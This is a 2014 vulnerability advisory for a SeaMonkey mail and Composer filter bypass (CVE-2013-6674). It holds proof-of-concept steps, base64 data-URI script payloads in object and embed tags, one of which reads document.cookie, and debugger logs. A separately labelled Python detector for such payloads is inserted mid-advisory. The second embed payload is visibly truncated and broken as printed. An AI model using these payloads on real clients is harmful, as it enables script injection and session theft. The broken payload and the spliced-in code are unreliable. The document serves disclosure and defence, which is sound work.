Mozilla SeaMonkey - Filter Bypass & Persistent Vulnerability

Vulnerability Laboratory [Research Team] - Ateeq ur Rehman Khan [[email protected]] [www.vulnerability-lab.com]
VULNERLAB: 967
Published: 2014-01-29

Document Title:
===============
Mozilla SeaMonkey - Filter Bypass & Persistent Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=967
Mozilla Bug Tracking ID: 881686

http://www.vulnerability-lab.com/get_content.php?id=953
Mozilla Bug Tracking ID: 875818

Exclusive News: (Partners)  http://news.softpedia.com/news/Critical-Validation-and-Filter-Bypass-Vulnerability-Fixed-in-Thunderbird-420962.shtml

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6674

CVE-ID:
=======
CVE-2013-6674


Release Date:
=============
2014-01-29


Vulnerability Laboratory ID (VL-ID):
====================================
967


Common Vulnerability Scoring System:
====================================
7.3


Product & Service Introduction:
===============================
SeaMonkey is a free and open source cross-platform Internet suite. It is the continuation of the former Mozilla Application Suite, 
based on the same source code. The development of SeaMonkey is community-driven, in contrast to the Mozilla Application Suite, which 
until its last released version (1.7.13) was governed by the Mozilla Foundation. The new project-leading group is the SeaMonkey Council.

SeaMonkey consists of a web browser (SeaMonkey Navigator), which is a descendant of the Netscape family, an e-mail and news client 
program (SeaMonkey Mail & Newsgroups, which shares code with Mozilla Thunderbird), an HTML editor (SeaMonkey Composer) and an IRC 
client (ChatZilla). The software suite supports skins. It comes with two skins in the default installation, Modern and Classic.

Mail
Mail features include support for multiple accounts, junk mail detection, message filters, HTML message support, a dictionary, an address 
book, customizable labels, add-ons and mail views, as well as integration with the rest of the suite.

Composer
SeaMonkey Composer is a WYSIWYG HTML editor. Its main user interface features four tabs: Normal (WYSIWYG), HTML tags, HTML code, and 
browser preview. The generated code is HTML 4.01 Transitional. As of version 1.1.13, SeaMonkey Composer supports basic text formatting 
and styling, insertion of hyperlinks and images, and the creation of tables. It does not support the addition of form elements (text 
fields, check boxes, and buttons). SeaMonkey Composer is scheduled to be updated with the release of KompoZer 0.8, which is currently 
under development.


Vendor Homepage: 	http://www.mozilla.org
Product website: 	http://www.seamonkey-project.org/releases/seamonkey2.17/


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a filter bypass and persistent validation web vulnerability in the Mozilla Seamonkey application.


Vulnerability Disclosure Timeline:
==================================
2013-05-10: Researcher Notification & Coordination (Ateeq ur Rehman Khan)
2013-05-11: Vendor Notification (Mozilla Security Incident Team)
2013-05-21: Vendor Response/Feedback (Mozilla Security Incident Team)
2014-01-18: Vendor Fix/Patch (Mozilla Developer Team - Reward 1.500$ SWB)
2014-01-27: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Mozilla
Product: Seamonkey 2.17.1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
Since SeaMonkey uses Mozilla Thunderbird as the backend for its mail client, it is prone to the same persistent vulnerability 
that I had reported earlier to the Mozilla Security Team. 

I will include the details again in this advisory for your reference and ease. 

Attaching a debugger to the SeaMonkey binary, it was initially noticed that malicious JavaScript tags were being filtered / blocked. 
By default, HTML tags like <script> and <iframe> are blocked in SeaMonkey and get filtered immediately upon insertion. However, 
while drafting a new email message, attackers can easily bypass the current input filters by base64-encoding their payloads inside 
a data: URI assigned to an <object> tag, inserting malicious script / code (e.g. script / frame) within the email and sending it to 
the victims. The exploit gets triggered once the victim decides to reply and clicks on the `Reply` or `Forward` buttons.

After successfully bypassing the input filters, an attacker can inject persistent script code while writing a new email and send 
it to victims. Interestingly, the payload gets filtered during the initial viewing mode; however, if the victim clicks on Reply or 
Forward, the exploit gets executed successfully. For a PoC I will be including multiple examples in this advisory for your review. 
I was able to run multiple scripts generating strange behaviour in the application, which can be seen in the debugging errors 
I have attached along with this report.

These sorts of vulnerabilities can result in multiple attack vectors on the client end which may eventually result in complete 
compromise of the end user system. The persistent code injection vulnerability is located within the main application. Exploitation 
of this persistent application vulnerability requires low or medium user interaction. Successful exploitation of the vulnerability 
may result in malicious script code being executed in the victim's browser, resulting in script code injection, persistent phishing, 
client-side redirects and similar client-side attacks.


Vulnerable Service(s):
[+] Seamonkey 2.17.1 - Latest Release 


Vulnerable Section(s):
[+] Compose (Compose in HTML)
[+] Email Signature (Mail & Newsgroups Account Settings)
[+] Attach File with Signature as HTML (Mail & Newsgroups Account Settings)


Proof of Concept (PoC):
=======================
The validation and filter bypass vulnerability can be exploited by remote attackers without a privileged application user account 
and direct user interaction. To demonstrate or reproduce the vulnerability, follow the steps and information provided below.

Proof of Concept #1

a) Create a new email message (Compose in HTML)
b) In the body text, insert a new HTML tag with the PoC "Payload"
c) Send the email to the victim (your test email account)
d) Open the new email in the victim's client and click Reply
e) You should now see a JavaScript Application popup window, proving the existence of this vulnerability.


Proof of Concept #2

a) Go to Edit and then Mail & Newsgroups Account Settings
b) Under the Signature Text, insert the Payload and enable 'Use HTML'
c) Close the menu and click on "Compose" (Compose in HTML) to create a new email
d) You should get a popup the moment the new email editor window opens, proving the existence of this vulnerability.


Proof of Concept #3

a) Create a new text file on your desktop (local computer), insert the PoC payload and save it as test.html (HTML)
b) Go to Edit and then Mail & Newsgroups Account Settings
c) Below the Signature Text box, enable 'Attach the signature from a file instead'
d) Click Choose and select the 'test.html' file which you created in step a.
e) Click on "Compose" (Compose in HTML) and you should see the JavaScript popup, proving the existence of this vulnerability.


Payload #1

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydChkT2NVbWVOdC5Db29LaWUpOzwvc2NyaXB0Pg=="></object>


Payload #2

<EMBED SRC="
L3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5
L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlZ1bG5lcmFi
bGUiKTs8L3NjcmlwdD48L3N2Zz4=" type="image/svg+xml" AllowScriptAccess="always"></EMBED>


1.3 POC Technical Description:

Here, we used the data URI payload as the value assigned to the 'data' attribute of the 'object' tag. The <object> tag is used to include objects
such as images, audio, videos, Java applets, ActiveX, PDF, and Flash. The 'data' attribute of the object tag defines a URL that refers to the
object's data. Data in the "data:" URI is encoded as a base64 string:

Base64-encoded payload: PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg==

Base64-decoded payload: <script>alert("Vulnerable");</script>

When the browser loads the object tag, it loads the resource assigned to its data attribute (in our case, an HTML document containing our
JavaScript), which causes our script to execute. The application's blacklist filter was bypassed because the blacklisted tag names appear only
inside the base64-encoded payload, which the filter does not decode before matching. 
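The blacklist-versus-data-URI point made here (and in the Technical Details section above) can be reproduced offline. The following Python script is an added example, not part of the original advisory and not SeaMonkey's own code: it models the tag blacklist the advisory describes, shows that Payload #1 passes it untouched, and then runs an allowlist-based inspector that decodes data: URIs in URL-bearing attributes and flags the embedded script (it also judges by MIME type, so the SVG case of Payload #2 is covered). The tag allowlist, the active MIME list and the function names are my own assumptions.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import unquote_to_bytes

# Payload #1 from the advisory, used as the sample input.
PAYLOAD_1 = ('<object data="data:text/html;base64,'
             'PHNjcmlwdD5hbGVydChkT2NVbWVOdC5Db29LaWUpOzwvc2NyaXB0Pg=="></object>')

# Tag blacklist modelled on the behaviour the advisory describes
# (a reconstruction for illustration, not SeaMonkey's own filter code).
_BLACKLISTED = re.compile(r"<\s*/?\s*(script|iframe)\b[^>]*>", re.I)

def blacklist_filter(html):
    """Strip <script> and <iframe> tags only; every other tag passes through."""
    return _BLACKLISTED.sub("", html)

_DATA_URI = re.compile(r"^\s*data:([^;,]*)((?:;[^;,]*)*),(.*)$", re.I | re.S)

def decode_data_uri(value):
    """Return (mime, payload bytes) for a data: URI, or None if it is not one."""
    m = _DATA_URI.match(value)
    if not m:
        return None
    mime = (m.group(1) or "text/plain").lower()
    if ";base64" in m.group(2).lower():
        try:
            data = base64.b64decode(m.group(3))
        except ValueError:  # binascii.Error is a ValueError
            data = b""  # undecodable body: the MIME type alone still gets judged below
    else:
        data = unquote_to_bytes(m.group(3))
    return mime, data

# Allowlist policy assumed for this example: plain formatting tags only, and every
# URL-bearing attribute is inspected after its data: URI (if any) is decoded.
ALLOWED_TAGS = {"html", "head", "body", "title", "meta", "p", "br", "b", "i",
                "em", "strong", "h1", "h2", "h3", "h4", "ul", "li", "a", "img"}
URL_ATTRS = {"href", "src", "data"}
ACTIVE_MIMES = {"text/html", "application/xhtml+xml", "image/svg+xml"}

class _Inspector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.findings.append(f"disallowed tag <{tag}>")
        for name, value in attrs:
            decoded = decode_data_uri(value) if name in URL_ATTRS and value else None
            if decoded is None:
                continue
            mime, data = decoded
            # A data: URI that is itself a document, or carries <script>, is active content.
            if mime in ACTIVE_MIMES or re.search(rb"<\s*script\b", data, re.I):
                self.findings.append(f"active data: URI in <{tag} {name}> ({mime}): {data[:48]!r}")

def inspect(html):
    """Allowlist-based check; returns the list of findings (empty means clean)."""
    p = _Inspector()
    p.feed(html)
    return p.findings
```

Running `inspect(PAYLOAD_1)` reports both the disallowed <object> tag and the decoded `<script>alert(dOcUmeNt.CooKie);</script>` body, while `blacklist_filter(PAYLOAD_1)` returns the payload unchanged.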





2.0 Seamonkey HTML Composer Preview - Input Filter Bypass Vulnerability


Details:
By default, HTML tags like <script> with alert/prompt are filtered in the Composer preview feature; however, using the <object> 
and/or <embed> tags with base64-encoded payloads it is possible to bypass the current filters and execute script code. I did 
notice that once you save the document as an .html file, all normal payloads like <script>alert(1)</script> work. It's an HTML 
composer, so maybe it's not supposed to filter any dangerous / malicious code by default, and I am definitely not challenging 
that at all. I just felt it's important to highlight the fact that if all other tags are being blocked in the preview, then this 
one actually bypasses the current SeaMonkey Composer preview filters and still works. 


Vulnerable Product(s):
[+] Seamonkey 2.17.1 - Latest Release 

Vulnerable Module(s):
[+] Composer (CTRL+4)

Vulnerable Section(s):
[+] HTML Source


2.1 Proof of Concept:

a) Open a new SeaMonkey Composer window
b) Go to the <HTML> Source tab
c) Copy/paste any one of the payloads listed under the "Payload" section anywhere in the code before the </body> tag.

Example code that I used for this PoC:

<html>
<head>
<meta content="text/html; charset=ISO-8859-1"
http-equiv="Content-Type">
<title>testtesttest</title>
</head>
<body>
<br>
<h4> </h4>
<h2> <object
data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg=="></object>
</h2>
</body>
</html>

d) Click on Preview and you should see the JavaScript popup, proving the existence of this filter bypass vulnerability.


Payload #1
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg=="></object>


Payload #2
<EMBED SRC="
L3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5
L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlZ1bG5lcmFi
bGUiKTs8L3NjcmlwdD48L3N2Zz4=" type="image/svg+xml" AllowScriptAccess="always"></EMBED>


2.3 Interesting Raw Application Logs captured during the entire process of testing:


[JavaScript Error: "ReferenceError: dOcUmeNt is not defined" {file: "data:text/html;base64,PHNjcmlwdD5hbGVydChkT2NVbWVOdC5Db29LaWUpOzwvc2NyaXB0Pg==" line: 1}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it." {file: "data:text/html;base64,PHNjcmlwdD5hbGVydChkT2NVbWVOdC5Db29LaWUpOzwvc2NyaXB0Pg==" line: 0}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it." {file: "data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==" line: 0}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it." {file: "data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==" line: 0}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it." {file: "data:text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg==" line: 0}]
ModLoad: 6fcd0000 6fce2000   C:\Windows\SysWOW64\dhcpcsvc.DLL
ModLoad: 6fcc0000 6fccd000   C:\Windows\SysWOW64\dhcpcsvc6.DLL
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it." {file: "data:text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg==" line: 0}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Warning: "Unknown property '-moz-border-radius-bottomleft'.  Declaration dropped." {file: "https://www.google.com/search?q=a%2520%2F%3E%22%3Ch1%3Ejakjbsf%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
[JavaScript Warning: "Unknown property '-moz-border-radius-topleft'.  Declaration dropped." {file: "https://www.google.com/search?q=a%2520%2F%3E%22%3Ch1%3Ejakjbsf%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
[JavaScript Warning: "Unknown property '-moz-border-radius-topright'.  Declaration dropped." {file: "https://www.google.com/search?q=a%2520%2F%3E%22%3Ch1%3Ejakjbsf%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
[JavaScript Warning: "Unknown property '-moz-border-radius-bottomright'.  Declaration dropped." {file: "https://www.google.com/search?q=a%2520%2F%3E%22%3Ch1%3Ejakjbsf%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
[JavaScript Warning: "Error in parsing value for 'filter'.  Declaration dropped." {file: "https://www.google.com/search?q=a%2520%2F%3E%22%3Ch1%3Ejakjbsf%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
[JavaScript Warning: "Unknown property '-moz-border-radius'.  Declaration dropped." {file: "https://www.google.com/search?q=a%2520%2F%3E%22%3Ch1%3Ejakjbsf%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
[JavaScript Warning: "Unknown property '-moz-box-shadow'.  Declaration dropped." {file: "https://www.google.com/search?q=a%2520%2F%3E%22%3Ch1%3Ejakjbsf%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
[JavaScript Warning: "Unknown pseudo-class or pseudo-element '-ms-clear'.  Ruleset ignored due to bad selector." {file: "https://www.google.com/search?q=a%2520%2F%3E%22%3Ch1%3Ejakjbsf%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
ModLoad: 139d0000 13a21000   C:\Windows\SysWOW64\WINSPOOL.DRV
(1af0.258c): Unknown exception - code 000006ba (first chance)
[JavaScript Error: "NS_ERROR_NOT_INITIALIZED: Component returned failure code: 0xc1f30001 (NS_ERROR_NOT_INITIALIZED) [nsIEditor.selectionController]" 
{file: "chrome://navigator/content/urlbarBindings.xml" line: 107}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Warning: "WARN addons.updates: Update manifest for [email protected] did not contain an updates property" 
{file: "resource://gre/modules/AddonUpdateChecker.jsm" line: 312}]
[JavaScript Warning: "WARN addons.updates: Update manifest for {972ce4c6-7e08-4474-a285-3208198ce6fd} did not contain an updates property" 
{file: "resource://gre/modules/AddonUpdateChecker.jsm" line: 312}]
versioncheck.addons.mozilla.org : server does not support RFC 5746, see CVE-2009-3555
versioncheck.addons.mozilla.org : server does not support RFC 5746, see CVE-2009-3555
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the 
document framing it." {file: "data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==" line: 0}]
[JavaScript Warning: "The character encoding declaration of the HTML document was not found when prescanning the first 1024 bytes of the file. When viewed in a differently-configured browser, this page will reload automatically. The encoding declaration needs to be moved to be within the first 1024 bytes of the file." {file: "file:///C:/Users/John%20Doe/Desktop/testtesttest.html" line: 5}]


Solution - Fix & Patch:
=======================
2014-01-18: Vendor Fix/Patch (Mozilla Developer Team - Reward 1.500$ SWB)


Security Risk:
==============
The security risk of the persistent input validation and input filter bypass vulnerabilities is estimated as high(+).


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq ur Rehman Khan [[email protected]] [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    [email protected] 	- [email protected] 	       - [email protected]
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact ([email protected] or [email protected]) to get a permission.

    				   	Copyright © 2014 | Vulnerability Laboratory